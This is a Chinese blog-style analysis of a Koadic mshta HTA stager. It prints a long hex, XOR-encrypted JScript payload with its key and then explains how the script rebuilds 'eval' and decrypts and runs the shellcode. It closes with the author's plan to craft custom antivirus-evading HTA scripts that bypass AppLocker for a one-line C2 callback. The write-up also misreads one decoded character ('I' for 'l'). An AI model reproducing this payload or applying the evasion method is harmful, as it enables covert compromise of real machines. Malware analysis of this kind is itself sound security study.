3f21783f7a6f2068021c706020510d764a7e7f4d2b246a622d62080865773c514435142a6d3a2d0d4f4b7f51282e555c5909194d1a325c35350447441b106b614b3e3b387e1f2b1b131d1a3c1c71337e1c18737c283861692e180e1709237378377b743c435a121859280f677f4d2b06534455621114757a263a7d0b3272382227507355015b3f3f6e7b13065524156774100313101d5740202a421a3f0944654a6d2128221b101f4e44282816723f22760436170717164d10144e5b2f72666c3f2f7e1037021a147e25415307762637575d1f425c220f28222f714d021f7f490f147872323b681631096b17083e717822640416651a241f553525203b26391e094b7f572529533e0a2a7e09270c011f0120740b3f6607027c6034367a0b4f081115043b627f3763077461732135600d391f1b06785257551d5d697f434753471222132b392a31195c13571e6b7f62715347120a316a0a1b725b78623b6a030e736e3b201e1e2f171c151821777e3f1a6071141a05144465487410091e3671612d63191c0b723f22760436170717165e4146195b3d7214142d1e6c2943660d770d4b4f3c03533b7a7c7b3c277f002c0118176d367c7833711e0267643747121b3d6d7d17083e717822640416651a241f55350f2e3b226b19541e3f6607027c6034367a0b4f08100b0532777e2c661874726e3e2a75092e041e0c78591b3c3f7d041179733c227e174a72746d724b445707121a107e6e2125791327196b17083e717822640416651a32035d37143b33351e115f534e7806177d7b36217e0931646b652e5219140b4c6b71657e3936600e281b10116b3a7d7b3e7d0e17787a21470d651f31746c720e101d3f6607027c6034367a0b4f08100b0532777e2c661874757b2021711d341901067859097c3a7f021571793f22606c5c6d28657b524c485719030e786c3b38751d2b037800163c6774307a100e671a273c7d133b01001d1f241a1f4e7806177d7b36217e0931646b652e0e101d574c6b717c603f347a1324151c0b7e37747a20700c126f6020426302200a0504193167795d1b721079793a23770a2f01066c6d524c145e103724141f3b387e1f2b1b131d1a3c1c71337e1c18737c283861692e1604141f356360277a61730d7e3e217b0826021809005b0f140b4c6b71144a53477a132f171c13152a787a5b750f1663763424691330611b10022267772070070c1e1d4a267f0a2a00110a1e3e621d481037781d160f12126c2b1b181f1a24776c3f7e671d7078242e750f381b0769013e62703e6013027a6059450b0d2e021d08173d7c7825197478484a5347123943641c131e2878623068031618733720650524070f13015e6b6523611c1f6075243f186e5a3d333325025c163f7d041179733c227e175a325c0d043e6a7c217713107a1a362a7c12230a1e1e04211c673b620f11646e2920647a073a382424195d585d1b4321424608664b31003d76223e135d5210407410627a292664023b051a69183779773773131d72785f3e5520332a372378527a7d397f1506656d2238750a3d131532220257580171263442461e00632215130a043f1e46441a5e1506785802306c040e2b33173117576a29730a0a141d4a1e5533143d3867351e515911573b614b3e120d44240967336e5a0b405301473b341405435902655a322b4d1a247c6e3f660c007c785f2b760b340d130f092463182c611f096371272d65145c29232933045b591b1a60504d4003153a3c172e2467351e515911573b677c603f347a1324151c0b7e38757d3470080071703d426222061d33263458107e3e7e04066a67283f64022c130a04250240531b460a35584003035c14043b0a1b131f5c42075d25066a7a1d1f6c1b2220322200115553296e061f7b77214e197c132a2232221e12531b51263e53464a113a24003b352f78151b3c0e402c2e43461f4e0474566d6d3a2d7a78623b6a030e736e3b201e1534160204003f7d643f0f32270d7e2522680d350a0c0d1c5e60632c660a0a797b23261e08310115040a3f757a310f2f2f585705055f29492b3733315c5a5314562c28451d7b174222153a2429703a66782d781d1f6c7e3d426017201717170038617c5b701c137d722324760f28671c131e28786230680316186624356404310019151a5e656c38700c0964662129186e4d2b3733315c5a5314562c28451d4a113a0d35010e0d0435687c391c1b0f6f60323c7f08330578131d3a7f7f3168180f6c0917195e241526392978151b3c0e463b233c4f070d4267092a37233502410b0e4f72325355150942343a6d3335221e5d14280f613f185a04015222136669227e1e475b17573b601419404e0b2f042e32222203691410403b345759144e6d7a492a7829311d571f4a5767345759145612120f243828271e100d1d57283e534602371222133d32222313106b481a2c745251020f422e113b3f283e590d535b562c295546181c442e0e216c65051e59581a4527780d46141845350f6f1c131e28786230680316186624356404310019151a5e7d663b710a0079733d2818224f22333423115553595a2c3b5251031f197c1c45352624135a1e101b43214b497b266409390502020a3a7e182767100e75643e23620d4f180c0a1235616427620c6750411f0f442e0e217e2d3f1259530c1b43214055034c5a280324333e6d58464f0557263c1e5e1e0e5b221866777a6d52475811572f335851154e19780b20342c3509087c217c111062712b267c69251a101608207d703d6772285340041e5e672b1b181f1a24776c3f7e671d67782b38600c361d196c3a1f505d104b62780d164a113a0d35010e0d0435687c391c1b0f6f60323c7f083305780e083c637d3c7e0518620917195e24152639297859384d03533b7a43461d517a132f171c13152a787a5b601c03627721237f152b61011d1d3277652760191f1e1d4a1e5533143d38671a247c6e3f660c007c785f3c6006390e061718237818376700117066392a780e493a242b794b4f3c3f6607027c6034367a0b4f1d031e043362793a600374607d222d7801360b17136d16475816462035581c1b03522c04367a213f0259054770202e1f3e0a1a5135412939353b4300741c467472424d01095f21492939353b4300741c46607b0b0953195e2304293f293514101f4a5426285d07432e59335b29372b23150940144069395b504c4e42320f2b3a2b63421c530d5769701c1e3a461a6d3d1378690c2c1c18296e67746a685f435d34093b3b2b7c2247583d660416774401005924003b3f283e52095f131a2f35445f425e722e15665c243d140f7c217c111062712b267c6935051410162866703c6b67146378232d72092009026f795b515b11092a37520912015469132a262b3113571e571863707d1e5b46126b2b1b181f1a24776c3f7e6708636d252f60082e1d1c69072a7f7430611b08667159065f250a2a2f6e794b46440c49030e786c3b38751d2b03780f173b737434680e1e7a1a23195e6f0222326b605c545719412c730d49120d44240967336e2b04404f0e781d146e7e25296a0d2d610c0906367d642279000e187c3e277a1224171e050958515b111b72275555050f586f04662d0d043e6a7c217713107a1a3c227513251b030919341a1f4e4f34273c7e2522680d350a0c0d1c5e6266346a080a667c22260d3c1c741c131e287862306803161864212d6806311f1e141a5e7c6e26750b11736621270d2114213533391f5c1e5c38322c574651044433117238323c1c0942074b43215e40051c0d290438760633045b40106a06385c51121818652c3c2e2a3c421c6510403f3f446c3c207813351f78717e40101f4e5a3d2e461a02094413082233282504411e451e7976061841450b3a6b2c373333181a535c383232424001515e22166f1724241944532d7d2b3053570544121008211e3324001c611c5c012e424423094132043c2269655e03145c09212e42445f1f553335263b223f0546455d01796a06045d5f0077517f7a7460400206590260614b3e030944321321762f2404420d0838030e786c3b38751d2b03781700316a77256201097c1a27257d143717180a14310f50005c2a2e5f5b1f445833153f7a2f35115653074160504d42101e102f042e322222030f1e014b393f595259045526052a243479510f0b5747273e5352180255234366692f35115653074173214b0f070d426702203833351e460b13532529530f1703426f172e24673b154b161c5c693253551509423448452d3131021240145e3c3f0b5c140d5422133c0d2c35096f0d1d463d2a184714186222103a33342438575711573b725d51084046260d3a336e6b19541e1e573074425b241c4022130c373435581b0b48100a1578603422646a35160602725938551a5c3d3f58404c18423204742b4d39161a17165d272e535a05453a3c093b22377e0357422757382f534705245526052a246f72335d580157272e1b60081c55654d6d3737201c5b5514462035581b1e0f4422156225332215535b571b72273c5c05184069122a2215350147530646013f5750141e1865042135283415401459781d146e7e25296a0d2d6111011c2570733d6b1d0b18653f3c760c33150e0b04581b1f4e5a3d2e461a02094415043e232223047a5314562c281e160204552b0d2c3e2420521e7c217c111062712b267c6926091a1212357a6f21636703656222397511201a056f7959094410463c28580f0c667a132f171c13152a787a5b62191b6e75213c78142b611412193b74643d7401130b52040253330820386f25025e1a11533d3b1a5c140d5422133c7f4d2b0653445556282e5709591849370420306f341146575c13746714411f0855210821332372590d521446286014164a1a513541272233204d78623b6a030e736e3b201e17310e0e0600207a653f1c070265733327751531047e6e6b184642051c262a535a594e6008321b746b25025e1a13532529531d4a266409390502020a3a7e182562080277642124630d4f191f0a03266a78387608725e40051c1c2f042e322222031b0d1d463d2a18471402546f052e2226794b405301473b34165c0518407c1c451c131e287862306803161861272d610d2d091c06094d494b4e781d146e7e25296a0d2d610306073c7a702f6a19120b4f0c577a132f171c13152a787a5b67080d7a7c3736681729610e0919226467207a131c0b0409540077517f6677604b78623b6a030e736e3b201e1220181a0f162a6a663d1c13116f64373d7d102b096b77284802064502796a070f3b387e1f2b1b131d1a3c1c6334650512706e293c786925191704123b63713a7d746a4e0c415c0077517f647c1a247c6e3f660c007c785f3971102d07101d08207a182d671c107b7b282564165c7f6d0d043e6a7c217713107a1a242d670b29090c1f00381c662c7d041c73642723727a50741c131e287862306803161861303b7c0f27150e17185e62612376190a726c263a0d755a050209083a66732f7805746375262078013b17060f7e2778792467130a7f6c3f51037c2b1b181f1a24776c3f7e670f77633d24761d391f1e691a3d62733a7e021177774c0a4529023b3f283e58515918423c2e534658664b31003d76243f1d424301573b671e40081c5528076735283d0047421040607b0b0953195e2304293f293514101f4a51263746410509427d4361747c2611401607572e6771510523522d042c226f72075b581855242e450e2d306c1b436435283d004742104062786a6803035f333d1332223611475a01081a2e5266140b60350e39746e6b0257420040277a445116574d4d2b1b181f1a24776c3f7e670f77633d24761d391f1e691d216a7733741c1962794c0a4529023b3f283e585a7d104b652a574019405b22186320263c05571a0353250e4f44144053280c3f233335021b3c0e4428281646140b0d0d35010e0d0435687c391c1c1b6178392a6a1f3107780d1d2077793979021b751c12035d37143b3335794b4053121c0a28535505097b2218673e0c35091e46144621730d5d174446260d1b2f37354d0f7c217c111062712b267c69340e010b1836686e257a670263613b217f1e281b076e5a0257515b612c2e654003055e20372e3a3235585a7d104b652a574019405b22186320263c05571f4e5725295314180a18310023023e20150f0b3f6607027c6034367a0b4f1a17101c38746c2d62017466632728601725170111797a4053121c1a3f427026236203372e3a3235585a7d104b652a574019405b22186320263c05571f4e5725295314180a18310023023e20150f0b3f6607027c6034367a0b4f1a17101c38746c2d620174617e3e3d651d31060e09797a4053121c1a3f426526236203372e3a3235585a7d104b652a574019405b22186320263c05571f4e5725295314180a18310023023e20150f0b3f6607027c6034367a0b4f1a17101c38746c2d620174666d3e21760231191905797a4053121c1a3f4276180251351819372b25151a5e3e573076465505041c2c04367a31311c47535c0934507c603f347a1324151c0b7e2a7c60337d1b0d7d7d25514b3a5a050209083a66732f7805746c7a272a7f1536041f137e387d7d3f670c027e76285156320f2c222e3f1e1a551856650b7d7b292975113503176e5a0b445707121a0d697c3828757a517420262250425f110f79614055034c610c2e17130206247e77481a3d2346511e0a18162a000e021526667a341b68670b16040254220726382234521b0924790602737127387c065b29372b231509401440690f716c3a247b16261e1e7a72075b581855242e450e0a055d37043d25283e11465f1a5c053f40511d51592a112a24343f1e534210107233501c20277f1f240a00131c311b3c0e670e027d7c3a3d771629646b657c501a7230701c1d1f164a113a31003d761d1336787a33640a1778095311111b3d130a690c2c40591a461506555d1c1a02655a39373570075f5f48752c2e79561b095333491a111f1b387967326301716c7737267c01370c1b09794b445707123a330b431c051e00043b7e6507195c145e107a68696403035322123c053331024643051060746544101b5e0e0f3c22263e1357695d1b72295f1a22045f30362638233f070f65226d011372714a1f5969223d33262415745a14553a670702465b077550796d34395e6a0b065b67030b47184268140835337a23191c4f265b333f0b054a1a51354138657520025d554845243318731418186536263874622f62441a512c29451658574626136f3b2224185d5248457a6846461e0f1e0a043b3e2834036d183c462c371e16321e5526152a746e6b065344555b270a57461001437a0c2a222f3f141c7f1b6228285759141855351261053731075c7f1b413d3b58571433186e5a2638173102535b061c0a355b591002540b0821337a331d560d1c5c193b44551c1f1e04143d24223e04765f07572a2e594608515e320d236d2e3e205344145f3a7466461e0f5534121c2226220447463c5c2f354459101859280f72252e6b065344555d3c2e6655030d5d345c38657520025d555b77313f55791418582805107e651302575701576b765f5a210d42260c3c7f7c22154643075c69354340210d42260c3c7817221f51530641003e0d497b266409390502020a3a7e1832751b0e7d64382e61095c342b7c1a247c6e3f660c007c785f2b77153504060e12217c1822751903667e293c7d065c29232933045b591b1a2a37521802185408143b062624181b3c0e51243e0b1612045337416d7d0d043e6a7c217713107a1a362a7c12230a1e1e04211c6f26641a0f73623039636f486474677650101d165f2d614055034c537a436a35283d0342531617697547145e0f10654a2c3b237b5212074b126b717c603f347a1324151c0b7e2478742274110e707d2842630f3007041101277e625d413d3e7941053c513309666d247b4d1016470c6f6b140f3b387e1f2b1b131d1a3c1c7e32790818776e36287c69333a386f335c021a01403c3f1f0f180a180d35010e0d0435687c391c0e1c7a613329781e351e78161e20747d27681116621c58510d65587c6065797a49401440693e574010517a132f171c13152a787a5b66031861722938760e38611012193a617a3e7c0c091e4705087f32151f37333859094b7f572529533e0a1a5135412b3733314d78623b6a030e736e3b201e132b0d01010824747f2c1c051e66712925621330097e3424147d430162282e5e1d4a113a0d35010e0d0435687c391c1d107463373464012816780b112a66603a6313147a1c02185408143b062624181b0d07573d2f445a5108513300742b4d1a247c6e3f660c007c785f2b77153504060e12217c183b7e1a0063643f2d620e5c29232933045b591b1a2a3752181703422c48452d31310212501a4022671e40081c552807673028221b1b17480f6b2f5850140a5929042b746e6f165d441e083d2843514a1a5135412c6b6575135d5b06422c3913145e1d1068026f746c331d560d3f6607027c6034367a0b4f07110c1132736c3276057464411f44532a0563636a655c13501a4022730d497b266409390502020a3a7e1821780b0d706c252a791e5c342b7c1a247c6e3f660c007c785f387a0536090e1316396b18267a18126462203b7c135c29232933045b591b1a393b425c58664b35043b23353e5078623b6a030e736e3b201e0f26041705112a7572391c0c2246551f087529172624283e1d575801613d285f5a161f1837003b3e6e6b0d387c217c111062712b267c6935051410162866703c6b67146378232d72092009027a36055c55015b26341e1d7b174626136f342623150f7c217c111062712b267c6935051410162866703c6b67097e65393e66163603026f7255657f3b760008131658574626136f253e23075d414306743857471447121b3d1c2f34073f6500416e15780d5d17447a132f171c13152a787a5b7b18096f76242778062c6110283c145744304a20294247591f49341620217164591b3c07573d2f445a511f493416202171644b405301473b341656101f556c43130a142903465318017b066a164a113a0d35010e0d0435687c391c1d1074633734640128167801053978653979071f650917195e2415263929780053421d1b43214055034c5c280e3f3528251e460b45093e325f5814444435142a7f4d2b19541e3f6607027c6034367a0b4f0607140932677d3d730474705d1d09753f083c2234783a66782d781d1f6c7e3d42640d2318101f04367b6f5b61010b7e66273d670b3567262624181b1f5314030e786c3b38751d2b03780e01236b742079011b7b1a360944010823336f1a247c6e3f660c007c785f387a0536090e1316396b18267a18126462203b7c13493f373338591b18265b333f080458664b3313365c3c2611401613567410627a292664023b051a691921616f3767021277795f2340220f1b333f24365b5a101a030e786c3b38751d2b0378131a3265702d660f136f1a2224610f331907101c241a46144621731a055d0a512b122a7a77794b445707122d3b42554c0a5469332a3723111c5e1e5c092f3e18771d03432249666d35350447441b122d3b42554a113a24003b352f78151b3c0e781d146e7e25296a0d2d611100022479663c701814187a3d3f6a1231011715195810461c5c2e7a07064642126c437f78777e41121b1b127b781a5210004322487435283e045b58005772274b3e140043226b343a283f005159005c3d710b054a05566f0d203937331f4758010c7862061d7b174222153a24297252094b7f781d146e7e25296a0d2d611100022479663c701814187a3d3f6a1231011715195810461c5c2e7a07064642126c437f78777e41121b1b127b781a521000432248742b3a2d7a78623b6a030e736e3b201e132b0d01010824747f2c1c051e66712925621330096b21251e51421c5d2772465505041c2219262533235c515307463c2e5f5858664b31003d762228194142060f612e4f441403566f04373f3424031b17480f6b2f5850140a5929042b746e6f154a5f06463a6050551d1f557c172e246733154042004620360b1c051540220e297e2435024643015b257317094c4e4529052a302e3e1556145c0d2a3f44400418592b5b29372b2315095f131a6810627a292664023b051a691921616f3767021277795f2a592b040a2e2e2304411e3f6607027c6034367a0b4f1b1c0507366a62337b1074657c2024621130181a13780053421d1b607c10510905433312665c3c261140161d57283e534602514b3a5a273326341540452e101a2e5740041f121a5c6d182824354a5f06466b617c603f347a1324151c0b7e22676f2171191579663b427f172f0c151d1f377e725d106b765e511008553512666d35350447441b106b614b3e070d42670d203937331f4758010f7961415c1800556f153d2322797a495f131a030e786c3b38751d2b03780e01236b742079011b7b1a37055c2224373f3424031a7c217c111062712b267c6935051410162866703c6b67097e65393e66163603026f2011465e5c1b6f7c7c603f347a1324151c0b7e3963652c701c117e753c42772215093f2b355878623b6a030e736e3b201e132b0d01010824747f2c1c1a12677c233a61102d1b7e3731045a1f5c1c1a334c514f5c194d1a26306f1a247c6e3f660c007c785f2b760b340d130f09246318247c191c7d662b347c1349666b7a72490100574e353953460519442e0d665c3c261140161b573e3543404c4e1513240206620c2c101d3f6607027c6034367a0b4f16181f1a227a67307a03721f1f534244654a6d2e33724b78623b6a030e736e3b201e00261d020c003970673b1c0716656e243c7e0633067e653315404200466b71145d1d4c1d220f2c39233550101d3f6607027c6034367a0b4f1b1c0507366a62337b1074657c2024621130181a13780053421d1b627816165a0255300e3a226e6b0653445556282e57093b387e1f2b1b131d1a3c1c623f701e1c6e6037256969271a1f0d033c79783061613453431e19446e5a050209083a66732f780574627e333b761f35091f1e7e3c736c2164060b6c7a3d445e2216202333794b4f3c105e3a3f3c4f070d4267073f6b0d043e6a7c217713107a1a383d631e231a1d0f113d1c7110460f335a5159266409390502020a3a7e1821780b0d706c252a791e4f1c1e1618226467227e1d7246550504196e5a3937357016560b1342671546511f2d43130437221424025757181a60614055034c5426152e6b21345e40531456613c461a22054a22487430237e135e59065761730d497b1e5533143d3867341146574e4f433f5a4714664b2b0e2026243f055c425e0f78615f5259005f28112c39323e040c074d0260504d46141845350f6d747c2d7a78623b6a030e736e3b201e00261d020c003970673b1c0716656e243c7e0633067e6520195c5155037b6d18165a4e0069516167677d1e1204571e2f3b5a4714450b3a1c325c0d043e6a7c217713107a1a252672102717020119291c7a34681d0c79652b227c7a073a382424195d585d42282e5e1d7b177a132f171c13152a787a5b7b18096f76242778062c6112223c154653335b253f1e7e2522680d350a0c0d1c5e667c37650f02627238351e14291e1e150621657a211a393b425c58404435142a7f7c2d4b46440c383233501c3b387e1f2b1b131d1a3c1c7220741802667b372465665c6d2533311757145c383233501c3b387e1f2b1b131d1a3c1c6f2461011b6e7b22297c6f48665c3c2611401605533d320b1622237613360e04020c2c7f5f16402629595205306c0e0f3b33353e154616304a39365946141e6c1b323b2f2b3503100d03533b7a5d510851120a00370524221942422646282e53591402443443741c131e287862306803161861303b7c0f27150e17185e7f672d730f1c63772521180d35010e0d0435687c391c1c1b6178392a6a1f3107781d1b296270247f1e107018010d442f4d24333e7c404a7033740f1c707237407a132f171c13152a787a5b67080d7a7c373668172961061006346266316a1e0c1f0f0c667a132f171c13152a787a5b601c03627721237f152b6119171e33716c3a75051e1e7e2522680d350a0c0d1c5e757039670b1f7e6d253d1e083617061e03317c743c1a60730d4003154b0d35010e0d0435687c391c1b0f6f60323c7f08330578111923737e33650d1b621c534e197c1c2c373333181a535c49030e786c3b38751d2b03781505296675257d06087c1a25217a0a280b0c16052a1a535c4f4310627a292664023b051a691d3e776231661c147f7059450b3a6b2a3a34357a495f131a030e786c3b38751d2b03781e01237a772d7d1a1f7a1c58453a030e1839353b245b5b105d3c2e1e1d4a095c3404451228071f405d395d262a1e1d4a114d4d022e22243858571f7f49030e786c3b38751d2b03781505296675257d06087c1a25217a0a280b0c16052a1a535c09345050411f0f442e0e2176033f275d441e1a60504d42101e10221120352f6d1e57415576282e531c58425722151b3f2a35581b0d03533b7a534c010542225c3f373523157b58011a030e786c3b38751d2b03781d02297b773d780d19741d4a05566f043f3924384e574e055b3b3f1f3e0a1e5533143d386736115e4510093450424608664b31003d76303f02590b3f6607027c6034367a0b4f1d031e043362793a6003747f6c3d3d7b0e2d0314137859095f131a3e35445f5f1f4426153a257a6d450207094e3e35445f5f1f4426153a257a6d4502045c383233501c0603422c4f3d3334201f5c4510662c22421a1d095e2015276877790b445707122335545f14150d300e3d3d69221541461a5c3a3f625109180b0d35010e0d0435687c391c1b0f6f60323c7f08330578111923737e33650d1b621c1b03522c04367a303f0259180646282e43474c51057753666d3a2d7a575a065743214451051942294129372b2315094b08382a3b42571944556e6b342422240540585554283645514a113a35043b23353e504644005772273c520402533308203867141f655907590535594459453a3c16273f2b35587659225d3b311e1d58577a132f171c13152a787a5b7f071f627025397e0e25677f7c2d7a54431b513d33595a51285f100e3d3d13391d5759004661733c4f1703426f172e2467394d020d1c0e786a0d1f5a05194d1a26306f71345d611a4022721f1d7b177a132f171c13152a787a5b7f071f627025397e0e25677f7c22154643075c72274b3e3b387e1f2b1b131d1a3c1c64206b1d19667b3e3e7a69370605061836657234666178141d4a266409390502020a3a7e18387c0c0e72602422790349666d3a','6u2IZ64ql0GaOVGPp2'));
</script>
</head><body><hta:application caption="no" windowstate="minimize" showintaskbar="no" scroll="no" navigable="no">
                 <!--  -->



</hta:application></body></html>

将以上混淆过的jscript解析一下

第一句

1
2
3
4
var SHSzCQGBJVzghugTWn="xGiUpcNKgRznTmrzmwTxXUTIcKeVaTKlLdqoYXUZjSXBqHqekssmTNvXiaKJkjyCHryIvJwJxLwncWQhnEFVNuUQiNbExxNoVxonC";
var yGttXEzDktKBo="EYVnHFoyIMMyNBKPNOygbgTQbtinuAqeAMOzURnXfBkJxlFMWVJUIUaiqHbIPLLhkKMWJXRiVOYBibfrPoXVOkTTnEmRWbclNJsmzWppJFWJgQSdctdPVK";
var shQIRVqJzbCLRgzHXt="vZmEJAmYdbGdBhZwvxoVAiyKgRkPHtWkqSlMIrTgsVIxKbEaSgJEAnDNHZiJVvajHgWPTcJcJRcQwveoElsCObfVfOSBvAHld";
var yVqyQhWNIgBKd="ADNuJzwGEEzQIvYwjSCKNcJhIiHyjnguXOjxFLCPVXuONOUtylGabwSPkwMJobTfIUsZWeRKBEkIUQIiFBflWsfcUhuJikZibKHuqWHIYFIp";

定义了四个变量

1
2
3
4
SHSzCQGBJVzghugTWn的字符串长度为101
yGttXEzDktKBo的字符串长度为118
shQIRVqJzbCLRgzHXt的字符串长度为97
yVqyQhWNIgBKd的字符串长度为108

JavaScript fromCharCode() 方法将 Unicode 编码转为一个字符:

var n = String.fromCharCode(65);

n 输出结果:

A

1
var lFhVDQaCJXqiUOBj=[String.fromCharCode(SHSzCQGBJVzghugTWn.length),String.fromCharCode(yGttXEzDktKBo.length),String.fromCharCode(shQIRVqJzbCLRgzHXt.length),String.fromCharCode(yVqyQhWNIgBKd.length)];

所以上面这一串就等于

1
var lFhVDQaCJXqiUOBj=[String.fromCharCode(101),String.fromCharCode(118),String.fromCharCode(97),String.fromCharCode(108)];

String.fromCharCode(101) = e

String.fromCharCode(118) = v

String.fromCharCode(97) = a

String.fromCharCode(108) = I

也就是eval

1
var lFhVDQaCJXqiUOBj= [e,v,a,l];

第二句

1
var LwlLkzJLYDYcZQ=this[lFhVDQaCJXqiUOBj[0+0-0]+lFhVDQaCJXqiUOBj[1+0-0]+lFhVDQaCJXqiUOBj[2+0-0]+lFhVDQaCJXqiUOBj[3+0-0]];

这一句使用了变量lFhVDQaCJXqiUOBj,一次取数组的第0,1,2,3位。

var LwlLkzJLYDYcZQ=this[e+v+a+l]

第三句

1
LwlLkzJLYDYcZQ(iHyfgYezYdlzJuWYzBQW('xx','6u2IZ64ql0GaOVGPp2'));

但在 JavaScript 中 this 不是固定不变的,它会随着执行环境的改变而改变。

因此我猜 LwlLkzJLYDYcZQ就代表eval,因此第三句就是

eval(函数名(‘参数一’,’参数二’))

第四句

1
2
3
4
5
6
function iHyfgYezYdlzJuWYzBQW(ZbFtBLJFye,rtQiUDRJRxXHhgR)
{var SbmAhbduRlCByVh='';
while(rtQiUDRJRxXHhgR.length<ZbFtBLJFye.length){rtQiUDRJRxXHhgR+=rtQiUDRJRxXHhgR;}
for(i=0+0-0;i<ZbFtBLJFye.length;i+=(2+0-0))
{var VWPwvEASzGQLjUsH=String.fromCharCode(parseInt(ZbFtBLJFye.substr(i,2+0-0),16+0-0)^rtQiUDRJRxXHhgR.charCodeAt(i/(2+0-0)));SbmAhbduRlCByVh=SbmAhbduRlCByVh+VWPwvEASzGQLjUsH;}
return SbmAhbduRlCByVh;}

修改一下,伪代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
function iHyfgYezYdlzJuWYzBQW(参数一,参数二)
{
    var 初始化='';

    while(参数二.length<参数一.length){
    //while(18<25518)
    //参数二是异或加密里面的key
    参数二+=参数二;
    }
    //这一步的目的是异或加密里面的密钥长度,增加到大于原文长度。只要密钥与数据的长度相同,这样的异或加密理论上是无法破解的。
    for(i=0;i<参数一.length;i+=2)
    // for(i=0;i<25518;i+=2)
    {
    var VWPwvEASzGQLjUsH=String.fromCharCode(parseInt(参数一.substr(i,2),16)^参数二.charCodeAt(i/2));
    初始化=初始化+VWPwvEASzGQLjUsH;
    }
    return 初始化;
}

最关键的是这一句 var VWPwvEASzGQLjUsH=String.fromCharCode(parseInt(参数一.substr(i,2),16)^参数二.charCodeAt(i/2));

parseInt(参数一.substr(i,2),16) 这一句的意思是,将参数一.substr(i,2)的值作为16进制,转换为10进制。

substr(i,2)的意思是将参数一从下标i开始取2个字符。

好了,看到这里就已经糊涂了。

koadic mshta原理

使用eval方法将字符串当作代码执行,这个字符串是经过亦或加密的shellcode。参数二是亦或加密的key。

总结

  1. 使用xor加密,可以使用自增,将key增加到原文的长度,这样就不用定义很长的key了,安全性也能得到保证。
  2. koadic hta脚本里使用了jscript,使用了xor加密的shellcode,免杀效果还行
  3. 接下来我们根据这个学到的方法,自定义免杀js,然后制作成hta。这样就可以绕过applocker一句话上线了。